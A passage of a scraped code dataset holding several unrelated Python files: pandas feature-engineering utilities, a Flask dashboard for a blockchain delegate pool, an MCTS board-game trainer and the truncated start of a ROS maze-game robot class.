pre_df[['fw1','fw2','fw3','fw4','fw5']].astype('bool').sum(axis=1)\n\n pre_df['fw_change'] = pre_df.apply(fw_change_counter,axis=1)\n pre_df['fw_flows'] = pre_df.apply(fw_flow_change,axis=1)\n pre_df['md_flows'] = pre_df.apply(md_flow_change,axis=1)\n \n ## mean, std 추가해볼만하다.\n pre_df['fw_mean'] = pre_df.apply(mean_str_fw_dum,axis=1)\n pre_df['fw_std'] = pre_df.apply(std_str_fw_dum,axis=1)\n fw_model_flow =pre_df.iloc[:,9:].values\n \n \n first_num = first_index\n count_num =num_df_user\n \n time_term = np.zeros((count_num,4))\n \n df['time_second'] = df['time'].apply(make_datetime_second)\n tre_t =df[['user_id','time_second']].drop_duplicates()\n\n for v in tqdm(tre_t.user_id.unique()):\n test =tre_t.loc[tre_t.user_id ==v].time_second\n if len(test) <=2:\n time_term[v-first_num,0] = 0\n time_term[v-first_num,1] = 0\n time_term[v-first_num,2] = test.values[-1]-test.values[0]\n time_term[v-first_num,3] = len(test)\n else:\n time_term[v-first_num,0] = (test -test.shift(1)).max().total_seconds()\n time_term[v-first_num,1] = (test -test.shift(1)).min().total_seconds()\n time_term[v-first_num,2] = test.values[-1]-test.values[0] \n time_term[v-first_num,3] = len(test)\n\n dft = pd.DataFrame(time_term).copy()\n\n dft[0] =dft[0]/3600\n dft[2] =dft[2]/3600/24/10e8\n dft[2] =np.where(dft[2].values==0,1,dft[2].values)\n dft[4] =dft[0]/dft[3]\n dft[4] = dft[0]/dft[3]*3600\n dft[5] = dft[0]/24/dft[2]\n time_term = dft.fillna(0).values\n \n \n tsed = df.dropna(axis=0).reset_index(drop=True)[['user_id','time','fwver']]\n dfw = tsed[['user_id','fwver']]\n fw_d =dfw.loc[(dfw !=dfw.shift(1)).sum(axis=1)>0]\n\n main_fw_ar = np.zeros((num_df_user,6))\n for i,tgid in enumerate(tqdm(range(first_index,first_index+num_df_user))):\n\n tgdf =fw_d.loc[fw_d.user_id ==tgid].iloc[1:,:]\n tgidtotal = tsed.loc[tsed.user_id ==tgid]\n try:\n data =tgidtotal.loc[sorted([tgidtotal.index[0]] + [x-1 for x in tgdf.index]+[x for x in tgdf.index] + [tgidtotal.index[-1]] )]\n t1 =data.time_second\n if len(t1) %2 !=0:\n print('lenth error')\n time_delta = (t1-t1.shift(1)).dt.total_seconds()\n\n main_fwver =data.loc[time_delta.loc[time_delta==time_delta.max()].index].fwver.values[0]\n main_fw_ar[i,0] = fwver_total_dic[main_fwver]\n main_fw_ar[i,1] =(time_delta[1::2].values).max().astype('float')/(time_delta.values[1:]).sum().astype('float') #target fw workingtime / total\n if len(time_delta) ==1:\n main_fw_ar[i,2] =0 #min of change fwver time==0\n main_fw_ar[i,3] =0 #std of change fwver time ==0\n main_fw_ar[i,4] =0 #std\n main_fw_ar[i,5] =0 #variance\n else:\n main_fw_ar[i,2] =time_delta[::2].min()/3600 # min hours\n main_fw_ar[i,3] =time_delta[::2].std()/3600\n main_fw_ar[i,4] =time_delta[1::2].values.astype('float').std()/3600 #std running time of fw\n main_fw_ar[i,5] =(time_delta[1::2].values.astype('float')/3600).var() #std running time of fw\n except:\n main_fw_ar[i,0] =0\n main_fw_ar[i,1] =0\n main_fw_ar[i,2] =0\n main_fw_ar[i,3] =0\n main_fw_ar[i,4] =0\n main_fw_ar[i,5] =0\n \n #5, 5, 6, 6\n return [fwver_np, fw_model_flow, time_term, main_fw_ar]\n\ndef check_unique(col,df1,df2):\n def change_len(x):\n if len(x) ==10:\n return x[:5]\n else:\n return x\n print(\"about\",col)\n if col !='fwvers':\n train_c = set(df1[col].unique())\n test_c = set(df2[col].unique())\n total = (train_c | test_c)\n else:\n train_c = set(df1[col].apply(change_len).unique())\n test_c = set(df2[col].apply(change_len).unique())\n total = (train_c | test_c) \n \n print()\n \n return total\n\ndef qual_change(df, user_num, user_min):\n tmp = df.groupby('user_id')[['quality_' + str(i) for i in range(13)]].nunique() - 1\n tmp2 = tmp.sum(axis=1)\n qual_dic = defaultdict(lambda: 0, zip(tmp2.index, tmp2))\n qaul_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_num)]})\n qaul_num['n_qualchange'] = qaul_num['user_id'].map(qual_dic)\n\n return qaul_num['n_qualchange'].values\n\n\ndef model_ft(df,user_num):\n # model_nm\n id_model = df[['user_id','model_nm']]\n #user_num = 14999\n #model = np.zeros((user_num,9))\n id_model_not_dup = id_model.drop_duplicates()\n id_model_count = id_model_not_dup.groupby('user_id').count()\n id_model_count_np = id_model_count.values\n\n if user_num == 15000 :\n id_model_count_np[13991 - 10000][0] = 3\n id_model_count_np[18525 - 10000][0] = 3\n id_model_count_np[20921 - 10000][0] = 3\n\n elif user_num == 14999:\n id_model_count_np=np.insert(id_model_count_np,13262,1)\n id_model_count_np[34758 - 30000] = 3\n\n return id_model_count_np\n\n\ndef qual_statics(df, user_count, user_min):\n # quality 11개 별 4개의 statics : 44개변수\n # -1의 갯수와 비율 2개\n # 12개, 24개, 24/12 비율\n # 총 49개\n for x in range(0,13):\n if x == 3 or x==4:\n pass\n else:\n qual_df = df.groupby('user_id')['quality_'+str(x)].agg(['mean', 'std', 'min', 'max'])\n qual_df = qual_df.reset_index()\n qaul_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n ql_mg = pd.merge(qaul_num,qual_df,on='user_id',how='left')\n ql_mg.drop('user_id',axis=1,inplace=True)\n ql_val = ql_mg.fillna(0).values\n if x == 0:\n qual_val_all = ql_val\n else:\n qual_val_all = np.concatenate((qual_val_all,ql_val),axis=1)\n\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n\n\n \n for x in range(0,13):\n if x == 3 or x==4:\n pass\n else:\n qual_i_mean = df['quality_'+str(x)].agg(['mean']) #값 하나\n\n user_qual_i_mean = df.groupby('user_id')['quality_'+str(x)].agg(['mean'])\n user_qual_i_mean = user_qual_i_mean.reset_index()\n user_qual_i_std = df.groupby('user_id')['quality_'+str(x)].agg(['std'])\n user_qual_i_std = user_qual_i_std.reset_index()\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n user_qual_i_mean_df = pd.merge(qual_num,user_qual_i_mean,on='user_id',how='left')\n user_qual_i_std_df = pd.merge(qual_num,user_qual_i_std,on='user_id',how='left')\n\n qual_ff = user_qual_i_std_df['std'] /(user_qual_i_mean_df['mean'] - qual_i_mean['mean'])\n qual_ff = qual_ff.fillna(0)\n qual_ff = qual_ff.values\n qual_ff = qual_ff.reshape((-1,1))\n\n if x == 0:\n qual_ff_all = qual_ff\n else:\n qual_ff_all = np.concatenate((qual_ff_all,qual_ff),axis=1)\n \n \n col = 'quality_1'\n q1_minus1_cnt = df[df[col] == -1 ].groupby('user_id').count()[col] \n q1_minus1_cnt = q1_minus1_cnt.reset_index(\"user_id\")\n q1_minus1_cnt_done = pd.merge(qual_num,q1_minus1_cnt,on='user_id',how='left')\n q1_minus1_cnt_done = q1_minus1_cnt_done.fillna(0)\n # q1_minus1_cnt_np = q1_minus1_cnt_done1.drop('user_id',axis=1).values\n # print(q1_minus1_cnt_np)\n\n ##quality_1에서 -1 비율\n qual_cnt = df.groupby('user_id').count()[col] \n qual_cnt = qual_cnt.reset_index(\"user_id\")\n qual_cnt.rename(columns = {col : col+'count'}, inplace = True)\n qual_cnt_done = pd.merge(qual_num,qual_cnt,on='user_id',how='left')\n\n q1_minus1_cnt_done[col+'_rate'] = q1_minus1_cnt_done[col] / qual_cnt_done[col+'count'] \n q1_minus1_cnt_done[col+'_rate'] = q1_minus1_cnt_done[col+'_rate'].fillna(0)\n # q1_minus1_rate_np = q1_minus1_rate.drop('user_id',axis=1)\n qual_num = q1_minus1_cnt_done\n\n # print(qual_num)\n qual_num.drop('user_id',axis=1,inplace=True)\n qual_minus_val = qual_num.values\n\n qual_num = pd.DataFrame(data={'user_id': [num for num in range(user_min, user_min+user_count)]})\n #qual_num = pd.DataFrame(data={'user_id': [num for num in range(10000,25000)]})\n\n temp = df.groupby(['user_id','time']).count()\n\n quality_12= temp.reset_index()[temp.reset_index().fwver==12].user_id.value_counts()\n\n quality_12_df = quality_12.to_frame()\n quality_12_df = quality_12_df.reset_index()\n quality_12_df = quality_12_df.rename(columns = {'index' :'user_id','user_id':'counts'})\n quality_12_sum = quality_12_df.counts.sum()\n qual_12 = pd.merge(qual_num,quality_12_df,on='user_id',how='left')\n qual_12 = qual_12['counts']\n\n # 12/전체cnt\n qual_12_rate = qual_12 / quality_12_sum\n qual_12_rate= qual_12_rate.fillna(0).values.reshape(-1,1)\n\n quality_24= temp.reset_index()[temp.reset_index().fwver==24].user_id.value_counts()\n quality_24_df = quality_24.to_frame()\n quality_24_df = quality_24_df.reset_index()\n quality_24_df = quality_24_df.rename(columns = {'index' :'user_id','user_id':'counts'})\n quality_24_sum = quality_24_df.counts.sum()\n qual_24 = pd.merge(qual_num,quality_24_df,on='user_id',how='left')\n qual_24 = qual_24['counts']\n qual_24_count_np = qual_24.values\n\n # 12/전체cnt\n qual_24_rate = qual_24 / quality_24_sum\n qual_24_rate= qual_24_rate.fillna(0).values.reshape(-1,1)\n \n #24/12 비율\n qual_24_12_rate = qual_24 / qual_12\n qual_24_12_rate = qual_24_12_rate.fillna(0)\n qual_24_12_rate_np = qual_24_12_rate.values.reshape(-1,1)\n\n\n return np.concatenate((qual_val_all,qual_minus_val,qual_12_rate, qual_24_rate , qual_24_12_rate_np,qual_ff_all),axis=1)\n\n\n\n\ndef nun_err(df,ver):\n df_cp = df.copy()\n df_cp['errtype_errcode']= df_cp['errtype'].astype('str') + '_' + df_cp['errcode'].astype('str')\n nun_err = df_cp.groupby('user_id')['errtype','errcode','errtype_errcode'].nunique().reset_index()\n if ver =='train':\n nun_err.drop('user_id', axis=1, inplace=True)\n nun_err_val = nun_err.values\n else:\n nun_err.loc[-1] = [43262, 0, 0, 0] # adding a row\n nun_err.index = nun_err.index + 1 # shifting index\n nun_err = nun_err.sort_values(by='user_id') # sorting by index\n nun_err.drop('user_id', axis=1, inplace=True)\n nun_err_val = nun_err.values\n\n return nun_err_val\n\n\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":30461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"124162117","text":"# -*- encoding:utf-8 -*-\nimport os\nimport io\nimport re\nimport json\nimport flask\nimport sqlite3\nimport datetime\nimport threading\nimport logging\nimport requests\n\nfrom flask_bootstrap import Bootstrap\nfrom collections import OrderedDict \nfrom zen import tfa, crypto\nfrom zen.cmn import loadConfig, loadJson\nfrom zen.chk import getBestSeed, getNextForgeRound\nfrom zen.tbw import loadTBW, spread, loadParam\nfrom zen.app import opt\n\nROOT = os.path.abspath(os.path.dirname(__file__))\n\n# create the application instance \napp = flask.Flask(__name__) \nBootstrap(app)\napp.config.update(\n\t# 300 seconds = 5 minutes lifetime session\n\tPERMANENT_SESSION_LIFETIME = 300,\n\t# used to encrypt cookies\n\t# secret key is generated each time app is restarted\n\tSECRET_KEY = os.urandom(24),\n\t# JS can't access cookies\n\tSESSION_COOKIE_HTTPONLY = True,\n\t# bi use of https\n\tSESSION_COOKIE_SECURE = False,\n\t# update cookies on each request\n\t# cookie are outdated after PERMANENT_SESSION_LIFETIME seconds of idle\n\tSESSION_REFRESH_EACH_REQUEST = True\n)\n\n\n# load all information\nCONFIG = loadConfig()\nPARAM = loadParam()\nLOCAL_API = \"http://localhost:%(port)s/api/\" % CONFIG\n# LOCAL_API = \"http://167.114.29.52:%(port)s/api/\" % CONFIG\n\n\n# show index\n@app.route(\"/\")\ndef render():\n\tglobal CONFIG, PARAM\n\tspread()\n\n\tweight = loadTBW()\n\ttokens = sum(weight.values())\n\tc = float(sum(weight.values()))\n\titems = [[k,v/max(1.0, c)*100] for k,v in weight.items()]\n\n\treturn flask.render_template(\n\t\t\"bs-layout.html\",\n\t\tnext_block=getNextForgeRound(CONFIG[\"peer\"], **CONFIG),\n\t\titems=sorted(items, key=lambda e:e[-1], reverse=True),\n\t\ttokens=tokens,\n\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\tshare=PARAM.get(\"share\", 1.),\n\t\tthreshold=PARAM.get(\"threshold\", 0.),\n\t\tsymbol=PARAM.get(\"symbol\", \"token\"),\n\t\texplorer=CONFIG[\"explorer\"]\n\t)\n\n\n@app.route(\"/history////\")\ndef render_history(field, value, start, number):\n\tglobal CONFIG, PARAM\n\tif value:\n\t\tif getattr(flask.g, \"search_field\", None) != field:\n\t\t\tflask.g.rows = search(**{field:value, \"table\":\"transactions\"})\n\t\t\tflask.g.search_field = field\n\n\t\treturn flask.render_template(\n\t\t\t\"bs-history.html\",\n\t\t\tfield=field,\n\t\t\tvalue=value,\n\t\t\tstart=start,\n\t\t\tnumber=number,\n\t\t\texplorer=CONFIG[\"explorer\"],\n\t\t\tsymbol=PARAM.get(\"symbol\", \"token\"),\n\t\t)\n\n\n@app.route(\"/stats\")\ndef get_stats():\n\treturn flask.render_template(\n\t\t\"bs-stats.html\",\n\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\tpayments=getFilesFromDirectory(\"archive\", \".tbw\", 'json')\n\t)\n\n\n@app.route(\"/logs\")\ndef get_logs():\n\t# check if logged in from cookies\n\tif not flask.session.get(\"logged\", False):\n\t\t# if not logged in return to login page\n\t\treturn flask.redirect(flask.url_for(\"login\"))\n\telse:\n\t\t# render manage page\n\t\treturn flask.render_template(\n\t\t\t\"bs-logs.html\",\n\t\t\tusername=PARAM.get(\"username\", \"_\"),\n\t\t\tpayments=getFilesFromDirectory(\"..\", \".log\")\n )\n\n\n@app.route(\"/optimize/////\")\ndef optimize(blockchain, vote, usernames, offsets, delta):\n\tdelta = max(delta, 10)\n\tpool = loadJson(os.path.join(ROOT, \"pool.%s.json\" % blockchain))\n\tif not len(pool):\n\t\treturn \"No public pool defined on %s blockchain !\" % blockchain\n\t# configure delegate behaviour according to blockchain parameters\n\topt.Delegate.configure(\n\t\tblocktime=CONFIG[\"blocktime\"],\n\t\tdelegates=CONFIG[\"delegates\"],\n\t\treward=float(requests.get(LOCAL_API+\"blocks/getReward\").json().get(\"reward\", 0))/100000000\n\t)\n\t# separate usernames\n\tdelegates = [\n\t\td for d in requests.get(LOCAL_API+\"delegates\").json().get(\"delegates\", []) \\\n\t\tif d[\"username\"] in (pool.keys() if usernames == \"all\" else usernames.split(\",\"))\n\t]\n\t# create delegate object for the solver\n\tdelegates = [\n\t\topt.Delegate(d[\"username\"], pool[d[\"username\"]][\"share\"], float(d[\"vote\"])/100000000, float(pool[d[\"username\"]][\"exclude\"])/100000000) \\\n\t\tfor d in delegates if d[\"username\"] in pool\n\t]\n\t# remove curent vote given in username order in offsets\n\tif usernames != \"all\":\n\t\ti = 0\n\t\tfor offset in [int(s) for s in offsets.split(\",\")]:\n\t\t\tdelegates[i].vote -= offset\n\t\t\ti += 1\n\t# resolve best vote spread\n\tif len(delegates):\n\t\treturn json.dumps(OrderedDict(sorted(\n\t\t\t[(k,v) for k,v in opt.solve(vote, delegates, step=delta).items() if v > 0],\n\t\t\tkey=lambda e:e[-1],\n\t\t\treverse=True\n\t\t)), indent=2)\n\telse:\n\t\treturn \"No public pool available !\"\n\n\n@app.route(\"/dashboard/share//\")\ndef compute_share(address, period):\n\tusername = PARAM[\"username\"]\n\n\texcludes = 0\n\tfor addr in PARAM[\"excludes\"]:\n\t\texcludes += float(requests.get(LOCAL_API+\"accounts/getBalance?address=\"+addr).json().get(\"balance\", 0))/100000000\n\n\treward = float(requests.get(LOCAL_API+\"blocks/getReward\").json().get(\"reward\", 0))/100000000\n\tbalance = float(requests.get(LOCAL_API+\"accounts/getBalance?address=\"+address).json().get(\"balance\", 0))/100000000\n\tvote = float(requests.get(LOCAL_API+\"delegates/get?username=\"+username).json().get(\"delegate\", {}).get(\"vote\", 0))/100000000\n\n\tforged = (period * 3600 * 24) / (CONFIG['blocktime'] * CONFIG['delegates']) * reward\n\tweight = balance/max(1, vote+balance-excludes) # avoid ZeroDivisioError :)\n\n\treturn flask.render_template(\n\t\t\"bs-dashboard.html\",\n\t\tusername=username,\n\t\tinfo={\n\t\t\t\"walletAddress\": address,\n\t\t\t\"walletAmount\": balance,\n\t\t\t\"walletAddressRatio\": weight,\n\t\t\t\"reward\": forged * weight * PARAM[\"share\"],\n\t\t\t\"period\": period,\n\t\t\t\"vote\" : vote\n\t\t}\n\t)\n\n\n@app.teardown_appcontext\ndef close(*args, **kw):\n\tif hasattr(flask.g, \"database\"):\n\t\tflask.g.database.close()\n\n\n@app.context_processor\ndef override_url_for():\n\treturn dict(url_for=dated_url_for)\n\n\n## Identification\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n\tglobal CONFIG, PARAM\n\t# enable session lifetime to 10 min\n\tflask.session[\"permanent\"] = True\n\t# if POST method send from login page or any POST containing a signature field\n\tif flask.request.method == \"POST\":\n\t\tflask.session.pop(\"logged\", None)\n\t\t# check signature match (signature must be sent as hexadecimal string)\n\t\ttry: check = tfa.check(CONFIG[\"publicKey\"], crypto.unhexlify(flask.request.form[\"signature\"]))\n\t\texcept: check = False\n\t\tif check:\n\t\t\t# store the logged state\n\t\t\tflask.session[\"logged\"] = True\n\t\t\t# go to manage page\n\t\t\treturn flask.redirect(flask.url_for(\"manage\"))\n\t\telse:\n\t\t\t# store the logged state\n\t\t\tflask.session[\"logged\"] = False\n\t\t\t# return to index\n\t\t\treturn flask.redirect(flask.url_for(\"render\"))\n\t# if classic access render login page \n\telse:\n\t\treturn flask.render_template(\"bs-login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n\t# store the logged state\n\tflask.session[\"logged\"] = False\n\t# return to index\n\treturn flask.redirect(flask.url_for(\"render\"))\n\n\n@app.route(\"/manage\")\ndef manage():\n\t# check if logged in from cookies\n\tif not flask.session.get(\"logged\", False):\n\t\t# if not logged in return to login page\n\t\treturn flask.redirect(flask.url_for(\"login\"))\n\telse:\n\t\t# render manage page\n\t\treturn flask.render_template(\"manage.html\")\n\n\ndef dated_url_for(endpoint, **values):\n\tif endpoint == 'static':\n\t\tfilename = values.get('filename', None)\n\t\tif filename:\n\t\t\tfile_path = os.path.join(app.root_path,\n\t\t\t\t\t\t\t\t\t endpoint, filename)\n\t\t\tvalues['q'] = int(os.stat(file_path).st_mtime)\n\treturn flask.url_for(endpoint, **values)\n\n\ndef format_datetime(value, size='medium'):\n\tif size == 'full':\n\t\tfmt = \"%A, %-d. %B %Y at %H:%M\"\n\telif size == 'minimal':\n\t\tfmt = \"%a, %d.%m.%y\"\n\telif size == 'medium':\n\t\tfmt = \"%a, %d.%m.%y %H:%M\"\n\t#the [:-6] permits to delete the +XX:YY at the end of the timestamp\n\ttuple_date = datetime.datetime.strptime(value[:-6], \"%Y-%m-%d %H:%M:%S.%f\")\n\treturn datetime.datetime.strftime(tuple_date, fmt)\napp.jinja_env.filters['datetime'] = format_datetime\n\n\ndef replace_regex(value, pattern, repl):\n\tapp.logger.info(\"Valeur : %s, pattern : %s, repl : %s\" % (value, pattern, repl))\n\tapp.logger.info(\"retour : %s\" % re.sub(pattern, repl, value))\n\treturn re.sub(pattern, repl, value)\napp.jinja_env.filters['replace_regex'] = replace_regex\n\n\ndef connect():\n\tif not hasattr(flask.g, \"database\"):\n\t\tsetattr(flask.g, \"database\", sqlite3.connect(os.path.join(app.root_path, \"..\", \"pay.db\")))\n\t\tflask.g.database.row_factory = sqlite3.Row\n\treturn flask.g.database.cursor()\n\n\ndef search(table=\"transaction\", **kw):\n\tcursor = connect()\n\tcursor.execute(\n\t\t\"SELECT * FROM %s WHERE %s=? ORDER BY timestamp DESC;\"%(table, kw.keys()[0]),\n\t\t(kw.values()[0], )\n\t)\n\tresult = cursor.fetchall()\n\treturn [dict(zip(row.keys(), row)) for row in result]\n\n\ndef getFilesFromDirectory(dirname, ext, method=None):\n\tfiles_data = {}\n\tbase = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n\tfor root, dirs, files in os.walk(os.path.join(base, dirname)):\n\t\tfor filename in files:\n\t\t\tif filename.endswith(ext):\n\t\t\t\tif method == 'json':\n\t\t\t\t\tfiles_data[filename.replace(ext, \"\")] = loadJson(os.path.join(root, filename))\n\t\t\t\telse: \n\t\t\t\t\twith io.open(os.path.join(root, filename), 'r') as in_:\n\t\t\t\t\t\tfiles_data[filename.replace(ext, \"\")] = in_.read()\n\treturn files_data\n","sub_path":"zen/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"364904683","text":"from battle import BattleGround\nfrom game import Game\nfrom model import Model\nfrom mcts import MCTS\nimport numpy as np\nimport os\nimport sys\nfrom pickle import Pickler, Unpickler\nfrom random import shuffle\nfrom utils import *\nimport pandas as pd\nimport datetime\n\n\nclass Trainer():\n def __init__(self, game, nnet, args):\n self.game = game\n self.nnet = nnet\n self.pnet = self.nnet.__class__(self.game) # the competitor network\n self.args = args\n self.mcts = MCTS(self.game, self.nnet, self.args)\n\n self.trainExamplesHistory = []\n self.loss_list = []\n self.win_rate_list = []\n self.self_play_count = 0\n\n def self_play(self, training=False):\n \"\"\"\n go through one run of self play and return training examples for nnet\n Returns: training examples of (standard_board, policy, win rate) \n \"\"\"\n # to avoid kos\n latest_two_s_a = []\n pass_count = 0\n\n training_examples = []\n episodeStep = 0\n board = self.game.get_init_board()\n\n while True:\n # check if game end\n r = self.game.check_is_end(board, 1)\n if r != 0 or pass_count >= 2 or episodeStep > self.game.get_action_size()*2:\n return training_examples\n\n episodeStep += 1\n\n # run mcts to get the training example from this root node\n policy, v = self.mcts.calculate_p_v(board, temp=1)\n\n # get all symmetry board for robustness\n symmetrics = self.game.get_all_perspectives(board, policy)\n for b, p in symmetrics:\n training_examples.append([b, p, v])\n\n # stop if exceed max step\n if episodeStep > self.game.get_action_size()*2:\n return training_examples\n\n # filter out ko actions\n s = self.game.to_string(board)\n valid_vector = self.game.get_valid_moves(board, 1)\n for a_position, _ in np.ndenumerate(valid_vector):\n if (s, a_position[0]) in latest_two_s_a:\n valid_vector[a_position] = 0\n\n # re_normalize\n policy *= valid_vector\n p_sum = np.sum(policy)\n if p_sum > 0:\n policy /= p_sum\n\n # must be movable\n if np.array(policy).sum() == 0:\n pass_count += 1\n board, curr_player = self.game.get_next_state(\n board, 1, -1)\n continue\n else:\n # to encourage the model to explore\n if training == True:\n policy = np.array(policy) + 0.5/self.game.get_action_size()\n p_sum = np.sum(policy)\n policy /= p_sum\n action = np.random.choice(len(policy), p=policy)\n\n # record recent s to a\n latest_two_s_a.append((s, action))\n if len(latest_two_s_a) > 2:\n latest_two_s_a.pop(0)\n\n board, curr_player = self.game.get_next_state(\n board, 1, action)\n board = self.game.get_standard_board(\n board, curr_player)\n\n pass_count = 0\n\n def learn(self):\n self.loss_list = []\n self.win_rate_list = []\n for i in range(1, self.args.iter_num+1):\n print(str(i) + 'th iteration at {} ->'.format(datetime.datetime.now().time()))\n iterationTrainExamples = []\n self.self_play_count = 0\n for j in range(self.args.self_play_num):\n print(\"self-play: {}\".format(j))\n self.self_play_count += 1\n self.mcts = MCTS(self.game, self.nnet, self.args)\n if self.self_play_count > 7:\n iterationTrainExamples += self.self_play()\n else:\n self.self_play()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n loss = self.nnet.train(trainExamples)\n self.loss_list.append(loss)\n\n result = test_MCTS_with_NNet(self.game, self.nnet,\n self.game.get_board_size()[0])\n self.win_rate_list.append(result)\n\n self.trainExamplesHistory = []\n print(\"current loss = {}\".format(loss))\n self.nnet.save_checkpoint(\n folder=self.args.checkpoint, filename='model_{}x{}.pth.tar'.format(*self.game.get_board_size()))\n\n df_loss = pd.DataFrame({'loss': self.loss_list})\n df_loss.to_csv('./plots/loss_{}x{}.csv'.format(\n *self.game.get_board_size()), sep=',')\n df_win_rate = pd.DataFrame({'win_rate': self.win_rate_list})\n df_win_rate.to_csv('./plots/win_rate_{}x{}.csv'.format(\n *self.game.get_board_size()), sep=',')\n\n\ndef test_MCTS_with_NNet(game, nnet, n):\n '''\n Returns:\n win rate for ai\n '''\n print(\"Test MCTS with CNN on {}X{} with {} search on each step:\".format(n, n, n*n))\n random_player = RandomPlayer(game)\n model = nnet\n local_args = dotdict({'tree_search_count': n*n, 'cpuct': 1.0})\n mcts = MCTS(game, model, local_args)\n def nnet_player(board): return mcts.calculate_p_v(board)\n bg = BattleGround(nnet_player, random_player.play, game)\n ai_win, random_win, draw = bg.playGames(5)\n return ai_win/(ai_win + random_win + draw)\n\n\nclass RandomPlayer():\n def __init__(self, game: \"Game\"):\n self.game = game\n\n def play(self, board):\n p = np.random.random_sample(self.game.get_action_size())\n valids = self.game.get_valid_moves(board, 1)\n p *= valids\n return p, 0.5\n\n\n# adjust params here\nargs = dotdict({\n 'iter_num': 100,\n 'self_play_num': 32,\n 'tree_search_count': 32,\n 'cpuct': 1,\n 'checkpoint': './train'\n})\n\n\nif __name__ == \"__main__\":\n print(\"-- Going to retrain all models\")\n print(\"-- Adjust params of trainer in train.py\")\n print(\"-- Default: will go through 100 iteration for each model\")\n print(\"-- Note: trained model will be saved to ./train\")\n print(\"-- Warning: it will be very slow to train to accelerate decrease self_play_num, tree_search_count, or iter_num\")\n\n print(\"-- train 4X4\")\n game = Game(4)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 5X5\")\n game = Game(5)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 6X6\")\n game = Game(6)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 7X7\")\n game = Game(7)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n\n print(\"-- train 8X8\")\n game = Game(8)\n model = Model(game)\n T = Trainer(game, model, args)\n T.learn()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"65257559","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import *\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom tf import TransformListener\nfrom tf.transformations import quaternion_from_euler\nimport math\nfrom std_srvs.srv import Empty\nfrom maze_game.srv import *\nimport numpy as np\nimport tf\nimport sys\n\n# /*! \\relates Robot\n# * Enum Indicated the robots current state to help facilitate transitions from one operation to the next.\n# */\nclass RobotState:\n IDLE, MOVING_TO_START, RUNNING_MAZE, FINISHED_MAZE = range(4)\n#/< Used to indicate that the robot is not doing anything and is ready to be re-tasked\n#/< Indicates that the robot is moving to the start of the maze\n# #/< Indicates that the robot is running the maze and should not be interrupted\n# #/< Indicates that the robot has finished the maze. This is used primarily for score logging and a future re-queue mechanism\n\n# class GameModel:\n# /**\n#*\\author Matthew Atkins\n#\n#*This class is used to represent an individual robot in the current game.\n#*The object interacts with ROS directly to update itself and should inform the MazeGame object\n#*associated with this game about relevant events such as taking \"damage\". It does provide topics for\n#*sending information, probably to rosbridge, about itself for things like updating the webUI.\n#\n#*The class is designed to support multiple robots using multiple Robot object instances. This class IS NOT\n#*designed to operate as an independent ROS node a robot should be created with service call a running maze_game\n#*node using the addRobot service. This service call requires a string robot_name that will be used to uniquely\n#*identify a given robot. Each will be given their own ROS namespace to operate in to avoid accidentally updating\n#*information incorrectly. The namespace is determine by the value of robot_name from the service call.\n#\n#*For example, to use two robots at the same time, robot1 and robot2 respectively, then the following namespaces\n#*will be created:\n#\n#*robot1 -> robot1/move_base/goal
\n#*robot2 -> robot2/move_base/goal\n#\n#*If only one robot is to be used, a service call to \"/maze_game/add_robot\" with robot_name set to \"\" will result in no namespace being\n#*prepended.\n#*\n\nclass Robot:\n def __init__(self, robotName, modelPtr):\n #Perform additional setup\n self.name = robotName\n self.model = modelPtr\n rospy.loginfo(\"subscribing to /%s/move_base/current_goal\\n\", self.name)\n # MYSTERIOUS LINE\n self.sub = rospy.subscribe(\"/\" + self.name + \"/move_base/current_goal\", 10, self.newGoalCallback, self.pointDex)\n self.pointDex = 0\n self.health = 100000\n #Distance from centerline (walls) variables\n self.distance = 0\n self.oldDistance = 0\n self.curGoal = self.model.getExpPointAt(0)\n self.curState = RobotState.IDLE\n self.started = False\n # MYSTERIOUS LINE\n self.addRobotService = rospy.advertiseService(self, \"/maze_game/submit_scores_\" + self.name, self.submitScores)\n #Check for parameters\n self.goal_tolerance = 0.2\n self.curState = RobotState.MOVING_TO_START #/< The robot's current state, initially set to IDLE.\n self.distance = np.inf #/< The robot's distance from the center of the maze's path\n self.oldDistance = np.inf #/< The previously observed distance from the center of the maze's path\n self.health = 1000 #/< Used to determine how 'good' a run through the maze was and approximately how long a robot was in contact with an obstacle.\n self.curGoal = None #/< The current goal used to calculate which path segment the distance calculation should be performed with respect to. Also used to compute the disparity between the robot's own notion of what is a 'good' goal and what the user actually give it.\n self.model = None #/< A pointer the GameModel to add this Robot instance to\n self.arivedAtLastGoal = None\n self.goal_tolerance = 0.2 #/< This is the value that check distance uses to see if the robot is within the target \"zone\" around it's current goal (stored in curGoal). It's important to know that this is the RADUIUS and not the diameter of the target zone.\n\n #Score recording and submission\n self.givenPoints = [] #/< Keeps track of the points that are given by the user\n self.expectedPoints = [] #/< Keeps track of the points that are expected by the robot\n self.goalArivalTimestamps = [] #/< Keeps track of when a Robot arrives at a certain goal/point in the maze. First point should be 